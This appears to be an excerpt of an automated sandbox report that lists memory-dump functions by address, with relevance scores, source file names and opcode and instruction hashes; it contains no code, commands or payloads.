                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdda669580231fcd07e8f9f4879954c2749ee037561e63055c67935c9127a508
                                                • Instruction ID: 1d4300dcaef14a589d94f75ad8289c09120c811b7eb60d97bfe15de8361b92d2
                                                • Opcode Fuzzy Hash: bdda669580231fcd07e8f9f4879954c2749ee037561e63055c67935c9127a508
                                                • Instruction Fuzzy Hash: 8D01663131C50A8BEB059B2CE4593F9B780EBA6310F28053ED949C35D1DA65A41C87C0
                                                Function 00007FFAACF12A19 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aecb953da5b51bf5cdee0d3204a79bd1349ed6d47ac47a047d86ed97abe11ffb
                                                • Instruction ID: f9a20e9e091f16f1902213b26174a3045da349eec21856bc0f16c8759d6b6d93
                                                • Opcode Fuzzy Hash: aecb953da5b51bf5cdee0d3204a79bd1349ed6d47ac47a047d86ed97abe11ffb
                                                • Instruction Fuzzy Hash: CC01D671A19A588FEB49E7A898512FCB7A1EF4A310F14006DD04EC3193DA2499068780
                                                Function 00007FFAACF161C2 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de3a1a26b30f75b1140bd25d071ecc2c5cfdf99b4f1f3bf02502775088c9f12e
                                                • Instruction ID: cd96a80e752c426e73b8a0a29df61bd3ee61b84d2f3b1ed638dab499ccce9d56
                                                • Opcode Fuzzy Hash: de3a1a26b30f75b1140bd25d071ecc2c5cfdf99b4f1f3bf02502775088c9f12e
                                                • Instruction Fuzzy Hash: 1711D274E1991ECFEF84DBA8D8409ACB7B1FF59300F504029E20EE3291CB25A805CB60
                                                Function 00007FFAACB20C38 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdfd791874bd1e6fb73294085560f63d8a844dedcd32916337c03a58c2947aa6
                                                • Instruction ID: 3972887e7319910fb1ffc809a91fde037959826d7dde4f1cef49d84f1e3ca808
                                                • Opcode Fuzzy Hash: fdfd791874bd1e6fb73294085560f63d8a844dedcd32916337c03a58c2947aa6
                                                • Instruction Fuzzy Hash: 45117C75A0E699CFE712DB68E8451AC7BB0EF83210F1484B6C048DB292F939994D8790
                                                Function 00007FFAACB20C40 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4134899851a70dd693cf569a33d0b7eacc00e560da37c8012eda89c67130344c
                                                • Instruction ID: b49e1a203fdd5d161284ced0162de37fe1815058b0271f52b7ad32677d225b20
                                                • Opcode Fuzzy Hash: 4134899851a70dd693cf569a33d0b7eacc00e560da37c8012eda89c67130344c
                                                • Instruction Fuzzy Hash: 0901AD71A0E288CFE702DB68E88419C7FB0EF43310F0484B6C048DB292EA38994DC780
                                                Function 00007FFAACF165BE Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad3f37d840becd2157fa66d9e30b682bd2a17f9ed3319a71fc8cfc01631b83d7
                                                • Instruction ID: fdd903ff2b6f06bd6e8be770b6fec95b332308962502aec5d32d4e655cfbe0f3
                                                • Opcode Fuzzy Hash: ad3f37d840becd2157fa66d9e30b682bd2a17f9ed3319a71fc8cfc01631b83d7
                                                • Instruction Fuzzy Hash: 5BF0C83271C6484FE758EB3898076BD77D1FB85225F14057FD5CBC7561C92298028781
                                                Function 00007FFAACB23F18 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a91b1754e2332e93813be6710607978551f75f01ea7663bb5b2b0f2f762d570c
                                                • Instruction ID: 97a12158b77baa99a69a323e3ae9739c5c60d6955c23ad93716c20769ecc64da
                                                • Opcode Fuzzy Hash: a91b1754e2332e93813be6710607978551f75f01ea7663bb5b2b0f2f762d570c
                                                • Instruction Fuzzy Hash: C9015234A09919CFEB59DF04C891AAA73E1FB69304F4041B9D00ED72A4DA36E908CF81
                                                Function 00007FFAACB20C48 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94e03dbc1cda80ff7d8d0c877f630f6882bfe85393612c4e430652d4392530e4
                                                • Instruction ID: 07f7a91acc456a4d7d6b298729fa68fb1ac6c3930dd28990a9d712f18122b250
                                                • Opcode Fuzzy Hash: 94e03dbc1cda80ff7d8d0c877f630f6882bfe85393612c4e430652d4392530e4
                                                • Instruction Fuzzy Hash: BE015E7190E289CFE712DB68D84419DBFB0EF47314F1481E6D049DB2A2EA389A49C780
                                                Function 00007FFAACF117EC Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 540dbe563e5e233eb9905f3ece6bca8fdbb12ecd657d513472553d34ab2b77a8
                                                • Instruction ID: 64d17e29f156d266ac9bf22a6ec9eaee1be059f28d0a0956a1f2db63941e7dc5
                                                • Opcode Fuzzy Hash: 540dbe563e5e233eb9905f3ece6bca8fdbb12ecd657d513472553d34ab2b77a8
                                                • Instruction Fuzzy Hash: A601A870918A5DCFDF59DBA8C895AACBBF1EB69301F14419DC00AEB251C671A841DF40
                                                Function 00007FFAACF11825 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a96bdde6a1f6d0c4e7869ed42c21a4fc391b7345103944e2205c48485cf1ab38
                                                • Instruction ID: 17a614e0ee7315b4653d08817a136b959e49f9160a921dbccfe2bff8c9e9093d
                                                • Opcode Fuzzy Hash: a96bdde6a1f6d0c4e7869ed42c21a4fc391b7345103944e2205c48485cf1ab38
                                                • Instruction Fuzzy Hash: C6019670909A5DCFDF59DBA8C895AACBBB1FF6A301F2045ADC00EEB251C671A845DF40
                                                Function 00007FFAACF1BEA2 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a756d121844b49045dc6e3e7f949856d6be041079716088b30f70093ced46773
                                                • Instruction ID: 4b5a32e09272f537478dede3d49bec7eb14789d89a5f03eed99078103e0bb9d1
                                                • Opcode Fuzzy Hash: a756d121844b49045dc6e3e7f949856d6be041079716088b30f70093ced46773
                                                • Instruction Fuzzy Hash: FCF0C27580E386DFE702CF7088554E93FE0EF03210F0440FAD58D87092C96C554E87A1
                                                Function 00007FFAACF11BB2 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b66e83d626948abaea4782be5dfdef1650e3a390d1d7c0fb9a834bc5f3538b13
                                                • Instruction ID: c6df56727dbedc2e407b8adbd49fa844768ff3bd2a1fdcf103affb3e79e6c37d
                                                • Opcode Fuzzy Hash: b66e83d626948abaea4782be5dfdef1650e3a390d1d7c0fb9a834bc5f3538b13
                                                • Instruction Fuzzy Hash: CEF0903144F386DFE706CB708C119A97BB8AF43204B1880E6E44ACB0B2D52D975AC7B1
                                                Function 00007FFAACF16FE2 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 152025cd33bb7234e60365caf76576a8f4cc6649847c640ff09ff90d65624968
                                                • Instruction ID: 365da3e5ea144c4a39fe2267b676aeb637205f3d9b2d222975b1e2f16a845c9b
                                                • Opcode Fuzzy Hash: 152025cd33bb7234e60365caf76576a8f4cc6649847c640ff09ff90d65624968
                                                • Instruction Fuzzy Hash: 51F0123645E386DFE7069B7088415997BE4EF43214B1540FAD499C7052DA2C554AC761
                                                Function 00007FFAACB25387 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af481a5ae0a2f3aa3e8f05e67fbb0d68e2ba3ce24978d5ace6384f30e43d319
                                                • Instruction ID: afa53a7ae046bd722a7d12d0b23881a2ab69c9703f799069546ae52008928e24
                                                • Opcode Fuzzy Hash: 7af481a5ae0a2f3aa3e8f05e67fbb0d68e2ba3ce24978d5ace6384f30e43d319
                                                • Instruction Fuzzy Hash: 15F0313095952ECAFB55EB14C8847FD72A0FF59312F4451B6C40ED3191EA7AAE898B80
                                                Function 00007FFAACF1D5F8 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 728d73e57d43d6850e294349a2a1a8e0e423796c47ed3f2d54b3afcbbc5db53e
                                                • Instruction ID: 17924a4b641a1f0ce0ef76bca366481f955f7bdc221f0d65ce04b4f53cea5ede
                                                • Opcode Fuzzy Hash: 728d73e57d43d6850e294349a2a1a8e0e423796c47ed3f2d54b3afcbbc5db53e
                                                • Instruction Fuzzy Hash: B7F0E20161FB06C9FA266B34E4212FD6B349F93310F20803AC60E8B4C1C91AA90D92E1
                                                Function 00007FFAACF187B8 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 590c5617b52b7257d98bca7054b07cae53b2e230cd6bc5c9e2b669887ced32e5
                                                • Instruction ID: 15245fd6dba248a7a54cb55c77641209c6f81b7ba9ea2dff4d1f6b1ff44e08f7
                                                • Opcode Fuzzy Hash: 590c5617b52b7257d98bca7054b07cae53b2e230cd6bc5c9e2b669887ced32e5
                                                • Instruction Fuzzy Hash: 3EF0E21561E70BC9FB215730E6122FEEA80AF53310F72863AC64F834C1CA19A44E63E2
                                                Function 00007FFAACF11ADF Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                • Instruction ID: debfee1d32642f0f8c499787ddb3b44830d7a14924ecb2a986b463062a052bf6
                                                • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                • Instruction Fuzzy Hash: 5EF0B27490AA58DFCF55EBA8C85AE99BBB0FF69310F10419DD00ADB262CA219845CF40
                                                Function 00007FFAACB2635F Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f306a130580fd856cdae0f7f930805868d05e224ea1b800deef066f8420d0ed
                                                • Instruction ID: 56c84efd751667bac104d3ce1e2485cf4c3888dcfd7a243360977e6927c5c457
                                                • Opcode Fuzzy Hash: 6f306a130580fd856cdae0f7f930805868d05e224ea1b800deef066f8420d0ed
                                                • Instruction Fuzzy Hash: C3E0ED30D0942687FBA49308D850BFD6354DB85300F14C0B8D90FA37C1ED29EE899785
                                                Function 00007FFAACB20B92 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                                • Instruction ID: 353ee1194ced6aece5aa9d5c56053e9e63b5e518aabd5846f4cab3e1f30202e0
                                                • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                                • Instruction Fuzzy Hash: 8FD0A73155E98A8FF785F738DC95854BFA0FF1F315B8914D6D04CC72A2E6458898C701
                                                Function 00007FFAACF128A7 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 271586653325663e5d2bdd91e70cdf52aaf7d7727d5b400d15718369f6b310ea
                                                • Instruction ID: 3b5183bfb080e9c805c8a6deef68507040aa85030d3050aa8180667e1eda19c4
                                                • Opcode Fuzzy Hash: 271586653325663e5d2bdd91e70cdf52aaf7d7727d5b400d15718369f6b310ea
                                                • Instruction Fuzzy Hash: 1BD01251D0E7858BF72A07B8086217C1990CF17380B1946BBD64E4A2D3DA48A84D53F1
                                                Function 00007FFAACF17CD7 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81ae466a81060168832a95bd26208e155c34b5eb3ce03a8cdc84a81d7abfaa32
                                                • Instruction ID: 18fa5e335cc5411565b9101576e35b86de2b34eefa476ed7f49df9266e00d4b4
                                                • Opcode Fuzzy Hash: 81ae466a81060168832a95bd26208e155c34b5eb3ce03a8cdc84a81d7abfaa32
                                                • Instruction Fuzzy Hash: E5D0C241D0F385CBFB160778086107C1EC08F2734074686B7D64E8A2C3D849784853B2
                                                Function 00007FFAACF1CB27 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 402d6a5b6bbe9d9c8722cad49b8aba14590f27e1a107421dd48995156ab57477
                                                • Instruction ID: bfc705868f8c84ea0d703618875c74e0c6c2d30173fb06875b6b98298978a72f
                                                • Opcode Fuzzy Hash: 402d6a5b6bbe9d9c8722cad49b8aba14590f27e1a107421dd48995156ab57477
                                                • Instruction Fuzzy Hash: 50D0C241E0F395CBF716037408A107C1E408F2B340B4542BAC71E8F2C3D849A94857A2
                                                Function 00007FFAACB206A5 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fb563ff932bab96a508533161290ee70b2af8b2c8a9efdcd38df131b551d61b
                                                • Instruction ID: 897d3fb43bced04d0f2af4a06cab5ecb60f0e68fea3b11b800777255325aa907
                                                • Opcode Fuzzy Hash: 5fb563ff932bab96a508533161290ee70b2af8b2c8a9efdcd38df131b551d61b
                                                • Instruction Fuzzy Hash: 8BC01220D1B42A81F402332EA40A4ACA1005BE6610FD08232C40D40081FC0FA0CE02C6
                                                Function 00007FFAACB212E0 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68a7ab50b5ac75bc4ec7db7105904607d2cebecb2b52a79f9562f041a2f087a1
                                                • Instruction ID: e3eab6fcd2bc7730865c0151c19c2e8fdf643a4ab08938554e1a9daa4b399714
                                                • Opcode Fuzzy Hash: 68a7ab50b5ac75bc4ec7db7105904607d2cebecb2b52a79f9562f041a2f087a1
                                                • Instruction Fuzzy Hash: 5BC04C345518198FDA48EB29C88591477A1FB1A215BD60090E40DC71B5E65ADCD5D781
                                                Function 00007FFAACF1338B Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38bd1c2b88e21f1fbb3ff350f7f03cce532cc83688eea358e5472ad9ffe2c8f1
                                                • Instruction ID: 5e6d856007520936b357fa0244d468234da30e21f7f8649b06a64a18c9fcb381
                                                • Opcode Fuzzy Hash: 38bd1c2b88e21f1fbb3ff350f7f03cce532cc83688eea358e5472ad9ffe2c8f1
                                                • Instruction Fuzzy Hash: 6ED0C910A0F793C6F6384B29817023D6591AF43700E34C43DCA9F939CACD1DF50D66A6
                                                Function 00007FFAACB2600D Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 290521726fa508155bf2113fcdfd249ee956fc44bd5d8a511c3f565414de60a1
                                                • Instruction ID: 936a5f01e119239d0035d081f96937e380f6e10f75f395c19c2b4cdc146ca324
                                                • Opcode Fuzzy Hash: 290521726fa508155bf2113fcdfd249ee956fc44bd5d8a511c3f565414de60a1
                                                • Instruction Fuzzy Hash: 13C08C81E0982A42F24AA724C01197E04434F40300F5040B8F00D863DADE0CAE0242CA
                                                Function 00007FFAACB206C8 Relevance: .0, Instructions: 8COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe1920de24ded48acad937166f2596bba7f8d409a21fe85a8c27c69d34cdf37f
                                                • Instruction ID: 9993c3ea830830f662b54433cf8b88f71dd6a5642e0401b7fb4cee415be6aa5f
                                                • Opcode Fuzzy Hash: fe1920de24ded48acad937166f2596bba7f8d409a21fe85a8c27c69d34cdf37f
                                                • Instruction Fuzzy Hash: B7B01210C6741F80B404337E584606574405F46100FC05170D40E40081FC4F50DC13C2

                                                Non-executed Functions

                                                Function 00007FFAACB209B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: c9$!k9$"s9$#{9
                                                • API String ID: 0-1692736845
                                                • Opcode ID: 1939e9668d5026caf6ceb965e958b8423a673a0d037518731f8133d98397edeb
                                                • Instruction ID: 3a81153a7f5541ba3b638c88e871f1fd2001203c246811b6e7cf3495984f2f29
                                                • Opcode Fuzzy Hash: 1939e9668d5026caf6ceb965e958b8423a673a0d037518731f8133d98397edeb
                                                • Instruction Fuzzy Hash: 1C4165E7A0E56356E31133FEF0859ED9B449F83339B489677E54C890B3AF086485C2E9